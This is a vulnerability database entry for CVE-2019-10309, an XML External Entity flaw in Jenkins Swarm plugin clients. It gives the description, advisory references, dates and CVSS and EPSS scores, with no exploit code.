CVE-2019-10309

critical

Description

Jenkins Self-Organizing Swarm Plug-in Modules Plugin clients that use UDP broadcasts to discover Jenkins masters do not prevent XML External Entity processing when processing the responses, allowing unauthorized attackers on the same network to read arbitrary files from Swarm clients.

References

https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0783

https://jenkins.io/security/advisory/2019-04-30/#SECURITY-1252

http://www.securityfocus.com/bid/108159

http://www.openwall.com/lists/oss-security/2019/04/30/5

Details

Source: Mitre, NVD

Published: 2019-04-30

Updated: 2026-06-17

Risk Information

CVSS v2

Base Score: 4.8

Vector: CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:P

Severity: Medium

CVSS v3

Base Score: 9.3

Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H

Severity: Critical

EPSS

EPSS: 0.00072